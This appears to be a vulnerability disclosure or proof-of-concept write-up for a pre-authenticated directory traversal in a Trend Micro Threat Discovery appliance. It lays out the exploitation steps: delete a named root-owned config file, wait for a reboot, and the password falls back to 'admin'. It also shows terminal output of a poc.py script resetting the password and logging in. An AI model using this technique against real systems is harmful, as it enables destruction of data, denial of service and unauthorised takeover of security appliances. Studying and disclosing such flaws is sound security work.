#### Summary: There exists a pre-authenticated directory traversal vulnerability that allows an attacker to delete any folder or file as root. This can result in an attacker causing a DoS or bypassing authentication. #### Exploitation: An attacker can use this vulnerability to bypass the authentication by reseting the default password back to 'admin'. 1. Delete the config file /opt/TrendMicro/MinorityReport/etc/igsa.conf 2. Wait for the server to be rebooted... It is highly likely the server will be rebooted because the deletion of the config file causes a DoS condition whereby no-body can even login... (since the md5 hashed pw is stored in the config file). Notes: ====== - (Un)fortunately, we were not able to find a pre-authenticated way to reboot the server, hence requiring slight user interaction (or patience) - No username required! #### Example: ``` saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py (+) usage: ./poc.py <target> <option [reset][login]> (+)...
#### Summary: There exists a pre-authenticated directory traversal vulnerability that allows an attacker to delete any folder or file as root. This can result in an attacker causing a DoS or bypassing authentication. #### Exploitation: An attacker can use this vulnerability to bypass the authentication by reseting the default password back to 'admin'. 1. Delete the config file /opt/TrendMicro/MinorityReport/etc/igsa.conf 2. Wait for the server to be rebooted... It is highly likely the server will be rebooted because the deletion of the config file causes a DoS condition whereby no-body can even login... (since the md5 hashed pw is stored in the config file). Notes: ====== - (Un)fortunately, we were not able to find a pre-authenticated way to reboot the server, hence requiring slight user interaction (or patience) - No username required! #### Example: ``` saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py (+) usage: ./poc.py <target> <option [reset][login]> (+) eg: ./poc.py 172.16.175.123 reset (+) eg: ./poc.py 172.16.175.123 login saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login (-) login failed saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 reset (+) resetting the default password... (+) success! now wait for a reboot... saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login (+) logged in... (+) authenticated session_id: de685c4feec6d698f8165a8af8489df1 ```
